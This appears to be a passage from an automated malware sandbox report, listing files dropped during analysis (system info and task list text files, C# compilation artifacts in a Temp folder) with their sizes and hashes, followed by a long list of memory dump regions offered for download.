a974718b683f42c559aa023716765b7cec717965e6579128e23255d168b83a72

SHA512
9c368814a2d7184feffd1dd02111c4cfbd4079911cd3595a7e713623dee60e755c232c415648059de3765e7407951c3d7a823806d0628de66bc40b5e87d73b21

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍ \System\System Info.txt

Filesize
2KB

MD5
70fdd33b56d87a22fac354bcbc18bd97

SHA1
c0fab0c0b46e3dfab2586dce61460f2eac497de4

SHA256
ea5561e1502ee06104df8c78e3c7db3affb2997cedb7ed13c8346fb967e61475

SHA512
3117a252e6dd5155ad4ee2ab5a8379801624aba5ef4b7f25f2a12e9029d336c1936242ee0b401689903d1b9a5104ffe7490aef246e9b9af9c4ef30e7797d145b

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍ \System\Task List.txt

Filesize
12KB

MD5
5b54940ef2534c436c69c369d4866d56

SHA1
fdf01c40a96a6118daac1a0717287a7f15769ed0

SHA256
269cba9980c33f2e4c091cec7b013640cfdb3934f59d7c244f7e344568b477ce

SHA512
833fdfbfc24ec2a1b04cd89f61721b6f84abd77ded3c79b4c0ee759657c4af0ab33ccfefed742ab5482a482fc318fbe47109063791df3653643f70af0c69f762

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\p5b4p0e4\CSC2A19867965334512904FF166D8FEF8A.TMP

Filesize
652B

MD5
bd494b463b5b9caae0fce72781e7e369

SHA1
0e243545e1ff4606a72aa7bb219d93da3c2ba3c7

SHA256
62faff6c3aa71acae6bc833809d26d64c5c4abf7fc76848a22ff276f9b74d283

SHA512
77932048e371fd13241b2bb5c3512c15cfae12fccba8498e206f551a0ee545339f10e05e1fe7967cc6e5769cee7ce62665f3eb8090d1e490be29ce10d738125f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\p5b4p0e4\p5b4p0e4.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\p5b4p0e4\p5b4p0e4.cmdline

Filesize
607B

MD5
fef91ea7b3a5dc997475a9fb18b092b4

SHA1
738e53dee2c083d4eeeac4d5eb3d1ab19b99bfad

SHA256
0391a8d14b02dba8c49f14ef303f34e1609957b90d04c3a27e601e8f76ba2108

SHA512
26719bb9c6c630d94117487182fd788af137b97dac400763d416f66c01dae701898e7567aa2c8ac4ae7cb83091ea456ec83a5725e894f80b903274db108aef3c

Download Submit
memory/348-91-0x000001C6B79C0000-0x000001C6B79E2000-memory.dmp

Filesize
136KB

Download
memory/924-30-0x00007FFB46900000-0x00007FFB46925000-memory.dmp

Filesize
148KB

Download
memory/924-264-0x00007FFB42F60000-0x00007FFB4302D000-memory.dmp

Filesize
820KB

Download
memory/924-78-0x00007FFB43350000-0x00007FFB4337D000-memory.dmp

Filesize
180KB

Download
memory/924-104-0x00007FFB43320000-0x00007FFB43344000-memory.dmp

Filesize
144KB

Download
memory/924-81-0x00007FFB42A90000-0x00007FFB42BAA000-memory.dmp

Filesize
1.1MB

Download
memory/924-79-0x00007FFB46E50000-0x00007FFB46E5D000-memory.dmp

Filesize
52KB

Download
memory/924-161-0x00007FFB42820000-0x00007FFB4299F000-memory.dmp

Filesize
1.5MB

Download
memory/924-70-0x00007FFB33C10000-0x00007FFB342D5000-memory.dmp

Filesize
6.8MB

Download
memory/924-195-0x00007FFB48F90000-0x00007FFB48FA9000-memory.dmp

Filesize
100KB

Download
memory/924-197-0x00007FFB470E0000-0x00007FFB470ED000-memory.dmp

Filesize
52KB

Download
memory/924-54-0x00007FFB43350000-0x00007FFB4337D000-memory.dmp

Filesize
180KB

Download
memory/924-74-0x00007FFB46900000-0x00007FFB46925000-memory.dmp

Filesize
148KB

Download
memory/924-213-0x00007FFB432E0000-0x00007FFB43313000-memory.dmp

Filesize
204KB

Download
memory/924-71-0x00007FFB42F60000-0x00007FFB4302D000-memory.dmp

Filesize
820KB

Download
memory/924-66-0x00007FFB432E0000-0x00007FFB43313000-memory.dmp

Filesize
204KB

Download
memory/924-64-0x00007FFB470E0000-0x00007FFB470ED000-memory.dmp

Filesize
52KB

Download
memory/924-62-0x00007FFB48F90000-0x00007FFB48FA9000-memory.dmp

Filesize
100KB

Download
memory/924-60-0x00007FFB42820000-0x00007FFB4299F000-memory.dmp

Filesize
1.5MB

Download
memory/924-58-0x00007FFB43320000-0x00007FFB43344000-memory.dmp

Filesize
144KB

Download
memory/924-56-0x00007FFB49190000-0x00007FFB491AA000-memory.dmp

Filesize
104KB

Download
memory/924-73-0x00007FFB336E0000-0x00007FFB33C09000-memory.dmp

Filesize
5.2MB

Download
memory/924-251-0x00007FFB46A20000-0x00007FFB46A34000-memory.dmp

Filesize
80KB

Download
memory/924-72-0x00000203EAB10000-0x00000203EB039000-memory.dmp

Filesize
5.2MB

Download
memory/924-48-0x00007FFB4C020000-0x00007FFB4C02F000-memory.dmp

Filesize
60KB

Download
memory/924-226-0x00000203EAB10000-0x00000203EB039000-memory.dmp

Filesize
5.2MB

Download
memory/924-225-0x00007FFB42F60000-0x00007FFB4302D000-memory.dmp

Filesize
820KB

Download
memory/924-25-0x00007FFB33C10000-0x00007FFB342D5000-memory.dmp

Filesize
6.8MB

Download
memory/924-238-0x00007FFB336E0000-0x00007FFB33C09000-memory.dmp

Filesize
5.2MB

Download
memory/924-239-0x00007FFB33C10000-0x00007FFB342D5000-memory.dmp

Filesize
6.8MB

Download
memory/924-253-0x00007FFB42A90000-0x00007FFB42BAA000-memory.dmp

Filesize
1.1MB

Download
memory/924-265-0x00000203EAB10000-0x00000203EB039000-memory.dmp

Filesize
5.2MB

Download
memory/924-76-0x00007FFB46A20000-0x00007FFB46A34000-memory.dmp

Filesize
80KB

Download
memory/924-263-0x00007FFB432E0000-0x00007FFB43313000-memory.dmp

Filesize
204KB

Download
memory/924-262-0x00007FFB470E0000-0x00007FFB470ED000-memory.dmp

Filesize
52KB

Download
memory/924-261-0x00007FFB48F90000-0x00007FFB48FA9000-memory.dmp

Filesize
100KB

Download
memory/924-260-0x00007FFB42820000-0x00007FFB4299F000-memory.dmp

Filesize
1.5MB

Download
memory/924-259-0x00007FFB43320000-0x00007FFB43344000-memory.dmp

Filesize
144KB

Download
memory/924-258-0x00007FFB49190000-0x00007FFB491AA000-memory.dmp

Filesize
104KB

Download
memory/924-257-0x00007FFB43350000-0x00007FFB4337D000-memory.dmp

Filesize
180KB

Download
memory/924-256-0x00007FFB4C020000-0x00007FFB4C02F000-memory.dmp

Filesize
60KB

Download
memory/924-255-0x00007FFB46900000-0x00007FFB46925000-memory.dmp

Filesize
148KB

Download
memory/924-254-0x00007FFB336E0000-0x00007FFB33C09000-memory.dmp

Filesize
5.2MB

Download
memory/924-252-0x00007FFB46E50000-0x00007FFB46E5D000-memory.dmp

Filesize
52KB

Download
memory/4856-137-0x000001FFECF00000-0x000001FFECF08000-memory.dmp

Filesize
32KB

Download